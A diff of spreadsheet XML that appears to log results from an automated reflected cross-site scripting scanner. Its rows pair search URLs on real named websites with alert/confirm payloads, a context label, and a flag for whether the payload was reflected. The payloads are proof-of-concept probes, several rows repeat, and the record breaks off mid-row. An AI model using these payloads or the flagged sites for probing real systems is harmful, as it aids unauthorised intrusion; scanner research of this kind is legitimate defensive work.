--- a/solvingissues/file.xlsx
+++ b/solvingissues/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:D29"/>
+  <dimension ref="A1:D79"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="A1" sqref="A1"/>
@@ -951,6 +951,1069 @@
         </is>
       </c>
     </row>
+    <row r="30">
+      <c r="A30" t="inlineStr">
+        <is>
+          <t>https://www.wattpad.com/search/?q='; confirm`1`; '&amp;ref=1</t>
+        </is>
+      </c>
+      <c r="B30" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C30" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D30" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;script type="text/javascript"&gt;
+        window.prefetched = {"search.stories.results.'; confirm`1`; '.false.false":{"data":{"total":0,"stories":[],"tags":[]}}};
+    &lt;/script&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="31">
+      <c r="A31" t="inlineStr">
+        <is>
+          <t>https://www.faz.net/suche/?query=' onmouseover='alert`1`&amp;resultsPerPage=20</t>
+        </is>
+      </c>
+      <c r="B31" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C31" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D31" t="inlineStr">
+        <is>
+          <t xml:space="preserve">&lt;div class="js-adobe-digital-data is-Invisible" data-digital-data='{"site":{"digitalAsset":"faz.net"},"internalSearch":{"term":"' onmouseover='alert`1`","numberOfResults":0},"page":{"name":"2.2064","ressort":"Suche","type":"suche","title":"Suche","seoTitle":"Suche und Suchergebnisse - FAZ"}}'&gt; , </t>
+        </is>
+      </c>
+    </row>
+    <row r="32">
+      <c r="A32" t="inlineStr">
+        <is>
+          <t>https://www.nejm.org/search?pageType=search&amp;q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;&amp;asug=</t>
+        </is>
+      </c>
+      <c r="B32" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C32" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D32" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="33">
+      <c r="A33" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q='; confirm`1`; '&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B33" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C33" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="34">
+      <c r="A34" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B34" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C34" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D34" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="35">
+      <c r="A35" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B35" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C35" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D35" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="36">
+      <c r="A36" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B36" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C36" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D36" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="37">
+      <c r="A37" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B37" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C37" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D37" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="38">
+      <c r="A38" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B38" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C38" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D38" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="39">
+      <c r="A39" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B39" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C39" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D39" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="40">
+      <c r="A40" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B40" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C40" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D40" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="41">
+      <c r="A41" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B41" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C41" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D41" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="42">
+      <c r="A42" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B42" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C42" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D42" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="43">
+      <c r="A43" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B43" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C43" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D43" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="44">
+      <c r="A44" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B44" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C44" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D44" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="45">
+      <c r="A45" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B45" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C45" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D45" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="46">
+      <c r="A46" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B46" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C46" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D46" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="47">
+      <c r="A47" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B47" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C47" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D47" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="48">
+      <c r="A48" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B48" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C48" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D48" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="49">
+      <c r="A49" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B49" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C49" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D49" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="50">
+      <c r="A50" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B50" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C50" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D50" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="51">
+      <c r="A51" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B51" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C51" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D51" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="52">
+      <c r="A52" t="inlineStr">
+        <is>
+          <t>https://www.sephora.fr/recherche?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B52" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C52" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D52" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="53">
+      <c r="A53" t="inlineStr">
+        <is>
+          <t>https://www.nejm.org/search?pageType=search&amp;q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;&amp;asug=</t>
+        </is>
+      </c>
+      <c r="B53" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C53" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D53" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="54">
+      <c r="A54" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q='; confirm`1`; '&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B54" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C54" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="55">
+      <c r="A55" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B55" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C55" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D55" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="56">
+      <c r="A56" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B56" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C56" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D56" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="57">
+      <c r="A57" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B57" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C57" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D57" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="58">
+      <c r="A58" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B58" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C58" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D58" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="59">
+      <c r="A59" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B59" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C59" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D59" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="60">
+      <c r="A60" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B60" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C60" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D60" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="61">
+      <c r="A61" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B61" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C61" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D61" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="62">
+      <c r="A62" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B62" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C62" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D62" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="63">
+      <c r="A63" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B63" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C63" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D63" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="64">
+      <c r="A64" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B64" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C64" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D64" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="65">
+      <c r="A65" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B65" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C65" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D65" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="66">
+      <c r="A66" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B66" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C66" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D66" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="67">
+      <c r="A67" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B67" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C67" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D67" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="68">
+      <c r="A68" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B68" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C68" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D68" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="69">
+      <c r="A69" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B69" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C69" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D69" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="70">
+      <c r="A70" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B70" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C70" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D70" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="71">
+      <c r="A71" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B71" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C71" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D71" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="72">
+      <c r="A72" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B72" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C72" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D72" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="73">
+      <c r="A73" t="inlineStr">
+        <is>
+          <t>https://www.sephora.fr/recherche?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B73" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C73" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D73" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="74">
+      <c r="A74" t="inlineStr">
+        <is>
+          <t>https://www.pullcast.eu/search?product='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B74" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C74" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="75">
+      <c r="A75" t="inlineStr">
+        <is>
+          <t>https://www.pullcast.eu/search?product=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B75" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C75" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="76">
+      <c r="A76" t="inlineStr">
+        <is>
+          <t>https://www.pullcast.eu/search?product='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B76" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C76" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="77">
+      <c r="A77" t="inlineStr">
+        <is>
+          <t>https://www.pullcast.eu/search?product=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B77" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C77" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="78">
+      <c r="A78" t="inlineStr">
+        <is>
+          <t>https://www.pullcast.eu/search?product='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B78" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C78" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="79">
+      <c r="A79" t="inlineStr">
+        <is>
+          <t>https://www.pullcast.eu/search?product=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B79" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C79" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D79" t="inlineStr"/>
+    </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/solvingissues/file.xlsx
+++ b/solvingissues/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:D79"/>
+  <dimension ref="A1:D118"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="A1" sqref="A1"/>
@@ -2012,7 +2012,868 @@
           <t>TRUE</t>
         </is>
       </c>
-      <c r="D79" t="inlineStr"/>
+    </row>
+    <row r="80">
+      <c r="A80" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror='alert`1`'&gt;</t>
+        </is>
+      </c>
+      <c r="B80" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C80" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D80" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="81">
+      <c r="A81" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=&lt;img src=x onerror="alert`1`"&gt;</t>
+        </is>
+      </c>
+      <c r="B81" t="inlineStr">
+        <is>
+          <t>HTML</t>
+        </is>
+      </c>
+      <c r="C81" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D81" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="82">
+      <c r="A82" t="inlineStr">
+        <is>
+          <t>https://www.burpee.com/search?q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B82" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C82" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+      <c r="D82" t="inlineStr">
+        <is>
